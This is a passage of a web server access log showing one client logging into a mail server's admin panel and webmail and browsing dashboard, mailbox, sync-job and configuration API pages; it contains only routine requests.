"https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:11:10 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 89] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:11:31 +0000] - 301 301 - GET https mail.hanmocnn.co.kr "/admin" [Client 222.117.41.51] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:07:11:31 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/" [Client 222.117.41.51] [Length 12114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:07:11:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:11:50 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/admin/" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:11:51 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/dashboard" [Client 222.117.41.51] [Length 30243] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:11:51 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:11:53 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/status/host" [Client 222.117.41.51] [Length 195] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:11:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/status/host" [Client 222.117.41.51] [Length 193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:04 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/status/host" [Client 222.117.41.51] [Length 197] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:10 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/status/host" [Client 222.117.41.51] [Length 197] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/status/host" [Client 222.117.41.51] [Length 198] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:21 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/status/host" [Client 222.117.41.51] [Length 195] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:23 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:23 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 11664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:24 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771139544581" [Client 222.117.41.51] [Length 371] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:24 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771139544639&_=1771139544580" [Client 222.117.41.51] [Length 3602] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:26 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/dashboard" [Client 222.117.41.51] [Length 30215] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:26 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:26 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/status/host" [Client 222.117.41.51] [Length 195] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:31 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/status/host" [Client 222.117.41.51] [Length 195] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/system" [Client 222.117.41.51] [Length 47207] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:33 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:33 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/presets/rspamd" [Client 222.117.41.51] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:33 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain-admin/all?_=1771139553700" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:12:33 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/admin/all?_=1771139553701" [Client 222.117.41.51] [Length 124] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:13:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/system" [Client 222.117.41.51] [Length 47202] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:13:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/presets/rspamd" [Client 222.117.41.51] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:13:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:13:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain-admin/all?_=1771139596438" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:13:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/admin/all?_=1771139596437" [Client 222.117.41.51] [Length 124] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:13:49 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/fwdhost/all?_=1771139596439" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:13:53 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/relayhost/all?_=1771139596440" [Client 222.117.41.51] [Length 193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:14:10 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/mailbox" [Client 222.117.41.51] [Length 35564] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:14:10 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/presets/sieve" [Client 222.117.41.51] [Length 1033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:14:11 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:14:11 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain/hanmocnn.co.kr" [Client 222.117.41.51] [Length 405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:14:11 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain/datatables?draw=1&columns%5B0%5D%5Bdata%5D=&columns%5B0%5D%5Bname%5D=&columns%5B0%5D%5Bsearchable%5D=false&columns%5B0%5D%5Borderable%5D=false&columns%5B0%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B0%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B1%5D%5Bdata%5D=chkbox&columns%5B1%5D%5Bname%5D=&columns%5B1%5D%5Bsearchable%5D=false&columns%5B1%5D%5Borderable%5D=false&columns%5B1%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B1%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B2%5D%5Bdata%5D=domain_h_name&columns%5B2%5D%5Bname%5D=&columns%5B2%5D%5Bsearchable%5D=true&columns%5B2%5D%5Borderable%5D=true&columns%5B2%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B2%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B3%5D%5Bdata%5D=aliases&columns%5B3%5D%5Bname%5D=&columns%5B3%5D%5Bsearchable%5D=false&columns%5B3%5D%5Borderable%5D=true&columns%5B3%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B3%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B4%5D%5Bdata%5D=mailboxes&columns%5B4%5D%5Bname%5D=&columns%5B4%5D%5Bsearchable%5D=false&columns%5B4%5D%5Borderable%5D=true&columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B4%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B5%5D%5Bdata%5D=quota&columns%5B5%5D%5Bname%5D=&columns%5B5%5D%5Bsearchable%5D=false&columns%5B5%5D%5Borderable%5D=true&columns%5B5%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B5%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B6%5D%5Bdata%5D=stats&columns%5B6%5D%5Bname%5D=&columns%5B6%5D%5Bsearchable%5D=false&columns%5B6%5D%5Borderable%5D=true&columns%5B6%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B6%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B7%5D%5Bdata%5D=def_quota_for_mbox&columns%5B7%5D%5Bname%5D=&columns%5B7%5D%5Bsearchable%5D=false&columns%5B7%5D%5Borderable%5D=true&columns%5B7%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B7%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B8%5D%5Bdata%5D=max_quota_for_mbox&columns%5B8%5D%5Bname%5D=&columns%5B8%5D%5Bsearchable%5D=false&columns%5B8%5D%5Borderable%5D=true&columns%5B8%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B8%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B9%5D%5Bdata%5D=rl&columns%5B9%5D%5Bname%5D=&columns%5B9%5D%5Bsearchable%5D=false&columns%5B9%5D%5Borderable%5D=false&columns%5B9%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B9%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B10%5D%5Bdata%5D=backupmx&columns%5B10%5D%5Bname%5D=&columns%5B10%5D%5Bsearchable%5D=false&columns%5B10%5D%5Borderable%5D=true&columns%5B10%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B10%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B11%5D%5Bdata%5D=domain_admins&columns%5B11%5D%5Bname%5D=&columns%5B11%5D%5Bsearchable%5D=false&columns%5B11%5D%5Borderable%5D=false&columns%5B11%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B11%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B12%5D%5Bdata%5D=created&columns%5B12%5D%5Bname%5D=&columns%5B12%5D%5Bsearchable%5D=false&columns%5B12%5D%5Borderable%5D=false&columns%5B12%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B12%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B13%5D%5Bdata%5D=modified&columns%5B13%5D%5Bname%5D=&columns%5B13%5D%5Bsearchable%5D=false&columns%5B13%5D%5Borderable%5D=false&columns%5B13%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B13%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B14%5D%5Bdata%5D=tags&columns%5B14%5D%5Bname%5D=&columns%5B14%5D%5Bsearchable%5D=true&columns%5B14%5D%5Borderable%5D=false&columns%5B14%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B14%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B15%5D%5Bdata%5D=active&columns%5B15%5D%5Bname%5D=&columns%5B15%5D%5Bsearchable%5D=false&columns%5B15%5D%5Borderable%5D=true&columns%5B15%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B15%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B16%5D%5Bdata%5D=action&columns%5B16%5D%5Bname%5D=&columns%5B16%5D%5Bsearchable%5D=false&columns%5B16%5D%5Borderable%5D=false&columns%5B16%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B16%5D%5Bsearch%5D%5Bregex%5D=false&order%5B0%5D%5Bcolumn%5D=0&order%5B0%5D%5Bdir%5D=asc&start=0&length=25&search%5Bvalue%5D=&search%5Bregex%5D=false&_=1771139651641" [Client 222.117.41.51] [Length 459] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:14:55 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/tls-policy-map/all?_=1771139651642" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:15:02 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/bcc/all?_=1771139651643" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:15:02 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/bcc-destination-options" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:15:02 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/recipient_map/all?_=1771139651644" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:15:07 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/filters/all?_=1771139651645" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:15:09 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/syncjobs/all/no_log?_=1771139651646" [Client 222.117.41.51] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:15:34 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/edit/syncjob/1" [Client 222.117.41.51] [Length 28361] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:15:34 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:05 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:05 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 11664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:05 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771139766300" [Client 222.117.41.51] [Length 371] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:05 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771139766337&_=1771139766299" [Client 222.117.41.51] [Length 3602] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:09 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/edit/syncjob/1" [Client 222.117.41.51] [Length 28360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:09 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:10 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/mailbox" [Client 222.117.41.51] [Length 35566] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:10 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/presets/sieve" [Client 222.117.41.51] [Length 1033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:10 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:10 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain/hanmocnn.co.kr" [Client 222.117.41.51] [Length 405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:16:10 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain/datatables?draw=1&columns%5B0%5D%5Bdata%5D=&columns%5B0%5D%5Bname%5D=&columns%5B0%5D%5Bsearchable%5D=false&columns%5B0%5D%5Borderable%5D=false&columns%5B0%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B0%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B1%5D%5Bdata%5D=chkbox&columns%5B1%5D%5Bname%5D=&columns%5B1%5D%5Bsearchable%5D=false&columns%5B1%5D%5Borderable%5D=false&columns%5B1%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B1%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B2%5D%5Bdata%5D=domain_h_name&columns%5B2%5D%5Bname%5D=&columns%5B2%5D%5Bsearchable%5D=true&columns%5B2%5D%5Borderable%5D=true&columns%5B2%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B2%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B3%5D%5Bdata%5D=aliases&columns%5B3%5D%5Bname%5D=&columns%5B3%5D%5Bsearchable%5D=false&columns%5B3%5D%5Borderable%5D=true&columns%5B3%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B3%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B4%5D%5Bdata%5D=mailboxes&columns%5B4%5D%5Bname%5D=&columns%5B4%5D%5Bsearchable%5D=false&columns%5B4%5D%5Borderable%5D=true&columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B4%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B5%5D%5Bdata%5D=quota&columns%5B5%5D%5Bname%5D=&columns%5B5%5D%5Bsearchable%5D=false&columns%5B5%5D%5Borderable%5D=true&columns%5B5%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B5%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B6%5D%5Bdata%5D=stats&columns%5B6%5D%5Bname%5D=&columns%5B6%5D%5Bsearchable%5D=false&columns%5B6%5D%5Borderable%5D=true&columns%5B6%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B6%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B7%5D%5Bdata%5D=def_quota_for_mbox&columns%5B7%5D%5Bname%5D=&columns%5B7%5D%5Bsearchable%5D=false&columns%5B7%5D%5Borderable%5D=true&columns%5B7%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B7%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B8%5D%5Bdata%5D=max_quota_for_mbox&columns%5B8%5D%5Bname%5D=&columns%5B8%5D%5Bsearchable%5D=false&columns%5B8%5D%5Borderable%5D=true&columns%5